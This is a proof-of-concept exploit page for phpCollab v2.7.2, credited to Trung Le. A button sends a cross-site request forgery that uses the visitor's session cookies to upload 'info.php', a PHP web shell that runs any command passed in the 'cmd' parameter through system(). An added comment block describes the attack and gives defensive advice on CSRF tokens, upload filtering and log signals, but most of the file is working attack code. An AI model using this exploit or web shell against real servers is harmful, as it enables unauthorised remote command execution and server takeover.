#/
#* phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script
#* Author : Trung Le
#* Tutorial Video : https://youtu.be/BLFbUJ4n8hY
#* Twitter : @lethanhtrungdbp
#* Facebook : fb.com/c0nc4nh0
#/
<!DOCTYPE html>
<html>
<title>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</title>
<body>
<script type="text/javascript">
/**
 * Proof-of-concept request builder for the issue named in the page title
 * (phpCollab v2.7.2, CSRF arbitrary file upload).
 *
 * When the button on this page is clicked, the function sends a hand-built
 * multipart/form-data POST to the application's add-client endpoint
 * (clients/editclient.php?action=add) from the visitor's browser, asking the
 * browser to attach that visitor's cookies. Takes no arguments, returns
 * nothing, and never reads the response.
 *
 * Reviewer notes (defensive):
 * - None of the form parts below is an anti-CSRF token, so the PoC
 *   presumably relies on the endpoint accepting state-changing requests on
 *   the session cookie alone -- confirm against the vendor fix. A per-session
 *   token checked server-side, plus SameSite cookies, closes that path.
 * - The file part is named "info.php" and declared application/octet-stream.
 *   An upload handler that is meant to take a client logo should allow-list
 *   image types by content, generate the stored file name itself, and write
 *   to a location the web server will not execute scripts from.
 * - Useful log signals: a multipart POST to editclient.php whose Origin or
 *   Referer is not the application itself, an upload part with a script
 *   extension, and later GET requests carrying a "cmd" query parameter to a
 *   file under the upload directory.
 */
function upload(){
var xhr = new XMLHttpRequest();
xhr.open("POST", "/phpcol/clients/editclient.php?action=add&", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2273947705998934173936604226");
// withCredentials asks the browser to include cookies on a cross-origin
// request; this is what makes the request ride on the logged-in user's session.
xhr.withCredentials = true;
// Multipart body: the add-client form fields (MAX_FILE_SIZE, owner, name,
// address, phone, url, email, comments, hourly_rate) followed by one file
// part, "upload". The file content is an HTML form plus a PHP block that
// passes the "cmd" query parameter to system(), i.e. a command-execution
// page if the server stores it where PHP files are interpreted.
var body = "-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n" +
"\r\n" +
"100000000\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="owner"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="name"\r\n" +
"\r\n" +
"100\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="address"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="phone"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="url"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="email"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="comments"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="hourly_rate"\r\n" +
"\r\n" +
"0.00\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="upload"; filename="info.php"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"<HTML><BODY>\r\n" +
"<FORM METHOD="GET" NAME="myform" ACTION="">\r\n" +
"<INPUT TYPE="text" NAME="cmd">\r\n" +
"<INPUT TYPE="submit" VALUE="Send">\r\n" +
"</FORM>\r\n" +
"<pre>\r\n" +
"<?\r\n" +
"if($_GET['cmd']) {\r\n" +
" system($_GET['cmd']);\r\n" +
" }\r\n" +
"?>\r\n" +
"</pre>\r\n" +
"</BODY></HTML>\r\n" +
"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750--\r\n";
// Copy the string into a byte array one UTF-16 code unit at a time (each
// value is reduced to a single byte by the Uint8Array store) and send it as
// a Blob, so the browser transmits the body as raw bytes.
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<h3>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</h3>
<form action="#">
<button type="button" onclick=upload()>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</button>
</form><br />
<iframe
style="border:2px;border-style:dashed;color:#d3d3d3"
srcdoc="command output frame"
width="700" height="600"
name="ZSL_iframe">
</iframe>
<br />
<font size="2" color="#d3d3d3">ZSL-2016-5328</font>
</body>
</html>